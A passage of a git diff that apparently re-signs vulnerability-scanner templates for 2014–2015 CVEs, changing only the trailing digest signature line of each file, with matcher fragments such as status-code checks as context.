4a0a004730450220397a7e198a6dbd7a9ba5f71f309235410db6456c3e9adc6754fac5707ed46e20022100d27aea6583034afffdf1f38bc3bcdd3f1b1979c5c706115d67e606cdd3d93ee1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index 19937a9e01..1f309769d6 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205da6c70a0fe54ba97ac56d7fecb1843d17bda88f1a1c50ffd1a36b2202e6485102202be4eb68427ac59ae3b6632546b156a7ac0797cdde15cf983ce1dcde3ecede9a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203f557959ed531ecf156905d90b13e5f813eccd01e89affd2f2e11f0339ddaf53022100919b319b1ca36d906d242952a09bf9c515393dd24eac0dd7cc4e2f2e6ab28add:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index 9264dc1dc1..87c1ba9a4c 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -69,5 +69,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ae929d6029bdcf9333833a1f4509a53de07bf5427f595ea7a90d26a4bd0a9b69022100c57a9ef34a7778f4edd122b6d7a8aeb1aef130f0b13f854571a98ba52303e711:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220160a798259a858f56cda050d8e575585353af3bf794cb9c220d85313ecb3f1fb02201107b325914581b1efc9e24aa78e45b5e4f04c8acaf5a215af0bfdf6b8563000:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 597adfa306..bcfce8b33c 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -42,5 +42,4 @@ http: part: interactsh_protocol words: - "http" - -# digest: 490a004630440220656e12059f47a92e6af4add74f2ce7918b28c1d61a1a5b637cb47eeb5ea079cb0220793b0c3bbc64bf5e0db88ea05a21d7e0910f673240275f67d15353287897eb92:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a6ccef856bb04797a44d4fd90fda1e2ff80609458e5643b63091e964e18f76a50221009d184c16e0d5872442affb50eddcd599122b7f412f43b7337040976c9227df7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index bdc9149eb2..0fcba0d59d 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205cf53b8b04f4658073f997aa8ccc1aaaf9f211ec7031857b771e4d567d6828f702203086a74340a35296b8f16e16a2c04b5109eb88b17244be10ea3b1e314d857755:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009fddb8105bc5579f8bcfdaadd546c44957842d4328fedb7f0d959a299df73443022100a20b86699413fd97427a8fc9a4de71011d2d3d1e96385822d9c164bc3664445d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 7030b14827..69a4e6d290 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100842816f2917241ca16a162745d581dc66431537ec78b1459bc1f11eeba2567350221009eb4b5580885621a40f262aa25ac747e12c30f0c82aeef5a7529b54bfe759e22:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220504930fb7dba3332c3c23d63fb2068f4e1f343ca96d299e854e02e7ed8470082022100a7d73c3c244b291c5999114d93a113f9d21e568f98677026820d3aaef5b25978:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index d7ca384841..3332448932 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b6f5a14ffbb0d369464d6f7eab2235aefd3924944e803a960c45b17065cc065502201094f5af814743f9e30fc1e25052cb28ca0a65a7cfc00ddbf598cafc2d9defc6:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100baae4474166f1619a16c1b28fee6e36779c13d30d5c777457ee9e359620d43de022100ea5901af91dae12f74b2991d90b135ef94a10ff6c9ebb329850c232b6730d059:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index 883b85edc8..b5f0f96462 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022015e277332627af03a3f7ca218ff7354ae346251dcfa1d6e4eb400f5369532fc402204cd6087f37b8fe2f1e83a8c437a6fd59986f070ed9239981deb44ac480232b70:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008d365553893c4004e98780e734be48d1c44b58a07edfcaf8a1543507f9384214022042ad8537d6141f422085a12dd73085121d3b6c63673ea7f893cb77469d692056:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 18c87086d5..f74a2f7a7b 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ea9d8c83c39f191fdd8ce978b268fbfc2118992e96196f40fbe65ebf841e7f4b022079e9a97119e5d14a9d394588b3b284ec00bb541f01faa18d440c3cb7f6c7772f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022052d4f8b4694540c7868d2412adec91bf7c230efa5159d63d3e964a62e5daaf45022100c72777ce0876765a7b61208a8ff99a2f405d7ca2c73a6f69ddbb775f4ce279a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index b543901655..ba782ab46f 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100aa60267a51561a2fb9368898fcd5af14b73d776175ffccf86100c286b677981f022100a059c675439191c09ff5db9f9754e21609f529a5a2fa9f0e8fb012f539f6d122:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210083f967aed9aa31ee6568da51c0c74ed3f6a315dc7d27f2374a2a93407bd7c1690220010bb7a86ef81734ec4e5880540c115a35c1f816b73796fe506200b4746b9849:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index 32908ce616..e197a9f591 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502203f91b5258df092cbf446412834c727a9c79042e55c8673e43887e5011fe657ab022100fb08f9fcd6564fd276bc804832dacbb6f968567a28bb45f74cc335a2232a76b7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100aa4a650e0fba19671eb670ab3d34ab03b11e147e48f04baaf600da266badc869022055ddde6d809a71ea76ba548a7035da9277f479d8e1182dfc853cf1d06a9cd37e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index 2a44028ff7..a81cfc15e1 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009d4b7a77a42e268dc27570307188864bbc69b090f65755358991d925cd0b786e022100c2bf34f8d7788e711845f80ad76192665ea070c1b251af5097c75ad43c473137:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207e6914f4398781e1d9efae4febe919d18a92d29dcb591fbf15995f9024cd0ae6022003c3adaa62919fdc13f762e50cf2524509383667a87dde547480021ceb3d83f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index d20fcbdc0e..fa908eccfb 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d14953175e8275f8f4fec5d475415e96425d53a4b449fe99b2b0ea4e403f1695022100b0e4ed26683b73093732c36be9293d94545f1295ff54fa7ae000acf638f18a6c:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022039f1126199a94844f9ea9107ed10d475d8bf958c70a110013d7b1698afb5ca7802203e1c387cbc9f0f35fda76916cf7e6ce03d46aa74f7195f2c83017a503698ab34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index e5e77a37df..d101c0da47 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200b7334ba2177a61caf6a2897bc067df2c05a80d06555cb1dcb445c9f6a1c892c022048a6fd6927fb5a51d9be4ec51e43157570b612377be5b8b921e45b20ed0829bd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022051036619adc3bb96ead4ed0f01dba64c5a326c0dde8e98add1e3214e97cc73ea022100ca255fd5e3780cc74ded04661e2da0df25c66566f93148dfea656eb0edb896d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index 5b59fcac78..2058c99857 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -57,5 +57,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ef3a73a31ca498c9be143ea0441cd61706cdcd571faec69547201d71d81bd9b502210083c241d958b2d6c9f9a6c6c9584710037e9cc3fada52203b55eae2ffb854318a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008c5228dc58d75695861f226128275162b935898e0ecfc3292f74e20dabc96efe022043df1701195daaad4b5491d3ab1bbd1375bccaed885af0884eac9d2b60b85fa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index f08de213bf..bb3d17368a 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100aa39ef2ad1d14c3e7b7214d051f9afa0d4cd671ba3520720ce7209200ec147fd0221008656ba7803556acda7574689f1799bfa371181b080ca2a66a72377cd5d955d6a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100918808f7241c19e3dd85144a50b5a6c2b145662f046e12fd3d9b5dd8d8f9c3cb022100f582d13bfc25d13f66dd86133b02e7ad33cd7f96fe97c43d83d9669cdac77740:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index 2003aabe4c..9ff259c25d 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -53,5 +53,4 @@ http: group: 1 regex: - '>PHP Version <\/td><td class="v">([0-9.]+)' - -# digest: 4b0a00483046022100c6754f933b4ec573a7fcad9dabb569e5f04caa57bd354974f15f2ade96af17f3022100b35422bb8d7397cd167c5e2a75d89e403fc37cf6d056ad3187fbf30e05403c4c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200f5cea65272b2a45681bb0e23a406429426404ee4f78525184e907aae8a09b0b022100e5142e9b3486751ecc3801830f131d174f652b8e128846967691c8185df7389b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index 370fb6e855..5bb68908be 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202987bd262b43137e50c1bc36efc82f63bd1c80e9f72332ef1fa517b4de3d26d802204604b0374d5a201316e37004f63c63e0ebae58f7202e91c16778766c5f25a571:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022002fa59168d926396bbf52d601be8b2f2b2e407f14277089e4fb797ae4d79fcfd02203c2eea4d18dbb45540679a0ded5b7be2e1df00824d83b4ba371b1a29dea9ab92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 1983df18ff..b0fd251159 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204230a94ea48be92798b710dde72292dd0c67c9d28392d8ed71904176c21cf03b02203b51b7c4a44ff15a4e3fad62d6f95ab282d34e8d32da1e3020292a3728fc8a6c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c3b89a2ffe233d6bc2b2e5c93d6485d4bb5351ff37b38ba309a734a52e33d67402204e12a199c91f3419c347a6e53e5e606f95e16b4cea4b6fb22ce9cdf13d0aaba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 8fbb9436d9..01d2010721 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100bc90d3059c1d510e84574fe9f03724e819854159ae716a13272fba1714941ac4022100f274b94fb95974aa11b8f65ba2863c4fd508ac324873013d1a54571ae197a441:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206837b94d453746df06b3dab83550185e19da50a1d1171631dbd324593cadf545022100ee47bfd786b38c85e73bcb2c2c81651ed7730be83c1c70e9716016d34bbc4ac6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index 9593054db8..f83d38497f 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210087619355a439f0f6db87af6b69080f97e00c7a0c70773ed517d239e8d6c82065022100e70651a0ec295317ddf4706a4a2cc8af9742b59ea7e30dfe301397780e6cb5a6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100af2820c56c355c789211c1dfc0424ddea0d331d31d692125863f5a863fbf2b4202204a84111635f121d69efbbcfda46f3b7d1dabcedd1092814b419c0af0db4a2991:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index 6a782122a9..a911af7d6d 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022003181d98467f926a53b3231a40ce84d98216f3ba3af26f0059020922c23427dc0221008071d2e0d8fca2adf818231c06159bc73dc2e365fd6146f6b97fb6efcd43567b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100aa038567ef589e20dc118d7af230af72128ab36b0da47028dac6abab41b64fc0022100f516187800fd8f829848add95440628a9d53e22a6d0d0e23baba3197c36211ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index 54282b7c89..72791c65d7 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220058552f83384c1ed0749633d0d1c6022c7734c669742a84f834201edda7a64d4022100f9c9034111f1769df2576c68e12719da7d32e4ab45ba85360d6358fd43f440cc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200a30a521bb50fae27f5a078f9c572359b2021e2c988ef5e0a17c809c57bb0a54022100c9381d49319ff05cbfeb9fe8a91bd90eacbc23c161244880fe70e1e55524bbf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index 04533cb98f..5652c91409 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207a5178bcd41c28b974ad983dffd3c5aa356d482255680b1b47b6ce058613fc330221009c5b9c6041f597190f9a46799c08162a4276042891ea16c1bbd8980aab4c5fa6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202001c7c2c6df1ce3b534cd80053daa93da7e4656a03d734ad40eb6ba9b8f77310221009fcc81fbe6ea0502b3bd3099601dfb185f8f2b2d29360e88b1742a475f67b06a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index 1911c54d99..70ade8a618 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210095f82a2776a89d2c30f456437a18a97468e98ea4a3fe7a76f599de019e9b31f402200c4df563182e4ffa85a25e1a9a463d789fdda65fefe47e6e2ed00238a66f4249:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204c40c2ac383f379a0bb4b9e26917e5ef78dcfc7f796d7b71eacfd43af8a78dd5022071cef7e2d6c874db97e80569d8745c02ccf2a33e66da35bcfbdfff09ccf24fd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index 961067c2d4..fdd4d49367 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100aad21e8a1221dad2eb2655cc6adc00f81cab634a8443b46a9dd13962ce36f4b9022100a051ce2276a050eb63eaccb465120298656d1ae825d9a5d343b2389a9b084005:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022037e1c6bca52c15158c524d744523cc134963add8d26484399251c0fea74bb79602210093df65e41e4007724605f9a6b4da96960dea4aa973585e9da970b3ba065a3e8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index 75a3b90ee3..128b345c80 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -37,5 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 4a0a0047304502206347237dc9408ed3c3886a02e4a9958d204ad2c29813910579ba2a08f2b4efed02210092c0cae63b0947e58e7d6e5667ca6241addef161c161f04f8f014ba5c4fba949:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203b242ad202c2d5415d46bdfebd759a3b4e1fe4048ea76db011118cc3157347d102204433a0356b6ca2315cf05a942c1658dd6d271e1d4df0ceebeeabf1a089fb161d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index 52f7b1ae06..6b89e977cf 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100925bc7ce175cace8ccbb20d4a8d0875e0d86a46d2354c1f0862ab990e2e029ff022042fbb62c15c39fb5ba4db611adc25e15e3160234ded997600a830a819a53e281:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203f06736f1db5cb181ab0da9c82bfc71c868f505c9d75b1a2861fb09eac1d9b97022035f80abfc3eb7710e70e853874b528cdefa8643b410c021c282a50b56211f46b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index 5f3fd35d40..fe6b7749c2 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100dcc573d8a9179c58012e7d79743c6a56034ce9c3eebbd3d85d04859570e0aa5302210097a11641aaeb20b098c6acfccd5ccab0ee5c453cdeea2a73f1e4f8847c28e657:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d7809e1dcef3d86c8976f6f19325aa2bb209b3e095af3e10d91f381bd7fa119a022034dd6baac9719919d105aa8ebcf04ea9490c4155517fefd6d87fd19f23ab4c94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index cd711e0e09..cdaf8218de 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e2695c3e6765ef4f243e7c7e000a25a7cd6b7890371647b4c9bd38d8edbb882c02202eb9bcd70e034fd802756a3207bbb8ab521b7af9375a415b07a8e1efb1aa55dd:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009572ee585dbdd4172d2cb2e83fe853b4df6cb48b72c593ca5b055899b57e623302210082e898bdce2e499f25b819a792cd03f9f89c2cad2ef4462a5da685d0e33cf7b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 9a167aaafd..ff35b01ea5 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a5679020e363e5ccbeebddb683f12a067d59c284b3fb2da62124b42d20ffa0ed022100db7e0783a38edc66e5e5a2d0aba721259f8d280a41c33f042dec96372364bdd8:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022038d0d37869fb5b6827f0c07a6ba6920cd9608d0b6200d5d9a4ce467b3b289f35022056802c4aa9e865c6bd5bdc666b2d91b0d91beb6458ebe88d280c6bd2ed6a7e76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml index b496f81419..5fffe0c998 100644 --- a/http/cves/2014/CVE-2014-9609.yaml +++ b/http/cves/2014/CVE-2014-9609.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a26c23157c5df2a98a0fb8208a6eea121250c3cf3caa7b9195aece5b7a138049022100974cbb5ad00f45cdcc2e03df17c5bec18bcda6ad7b4b486c8d66774ec8393713:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022063f63d3e359f5307717def43f716280c749d60d95ccfbd334dd43925793ea6e30221008ff5ed88bc6430785820dce12d2f6b0d462eeeac55619dfa76dd1c8373bc402a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index c1f71d8b36..fa2ffcaf4c 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 302 - -# digest: 4b0a00483046022100f43c47d26259e63bd034f2af13bac5b568e1d76ffd8df3771bd2af4f3685e113022100835d880e13f89c4444ae92db7098ed7f2250c9edf13e6669cb0bbcf5abe97eb4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fbd88b2c575ddda9441093d01b8776a3fbdf94fb13bbcdb86074ee2b36062b380220559a9c6af3538744801e1f96829c8b76f8acbdb56799071a73bf28b2ebaad369:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index 5e08cf1618..409d8e1945 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220445c71292e0fee9a6faa3c397215bbd69ae2852e94fe4467726e523e3685f2440220498b321913562695f514b284435d1e45991b5ef67f46a0059ce19eb09d2c8ed1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220224f9c50cb6b680195b5fad86cf2aec8ad6a2f13dd979b0307b4e190c6136227022100e5ef6371522ce27f2dd8d1c6fe28ca037e11674d7f84cc14317fb3de8ef7c84f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index 47a6b9b798..8c9b2796ee 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -35,5 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 4a0a0047304502202aeb6c17bdbf19c23f441e65fe6000dde289a3b560e825a3736d6051fccafdaf022100aa33a6b239e1d80125b26b267e186f31bb1458a2160ac1b5cc18f5a77721b16f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210094ec1089c0a94013a80fa24871bd31d5af12a905aed55af80ec6808e315c3e45022100ab5dd57ed571bc88dfce7f88352639a77d624a2d2e5ff4a7e7cc701397d37a67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index c6cf3f44cf..ac38791416 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200366bfee23fc40b86f5938cf2a0046fd5eec2cbb0b85c4106aae555bc432d24e0220008a125e8568dbeb62884c21ac26ed26f56636e0bf4a588b68703e827c06d553:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204decea496284f2ff5de8ea833816d2397989c4fdd11efa56da15a4478229c1180220324abc5938c8d88d9f32b03b1ac65ab84331be81320f5d0f4dbd017c85bd28fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index 9f6adccd46..3a879995e4 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a18567637b0ac22a501e564bc1f158696c6036a0d461d526e49aeb7af2d8f923022100f4dd8cb152c61d1fdf20609d48b901307315633fdf3d2f03062fc7f1f03f68dd:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022071f71331e80036a1e8477f0f6a7de6d9f12e10422ab324b9bb2debe17bcccccb0220373044b153107c4578f8e500bc17ba7901f7677db70116949d0b7b7cb25853f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index 845a8ade03..a75ff6cfb6 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210093f7118e2aec665ce0ba6ce88e98d588b49bf23024c5cd4b01e96b15563394f3022100bbddcc4202f3e65b71f017e98562042a68dea97fe09d464e9ab405b8a9cf1b99:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e72a279b9251a1beeb8ab94364f2f1784dcc36f39b35ec8d90487b9afdff81f60220713c860db4ad4325e392aba18c2022ba2cfc206bc9157ed0a3f4d08e721daa46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml index 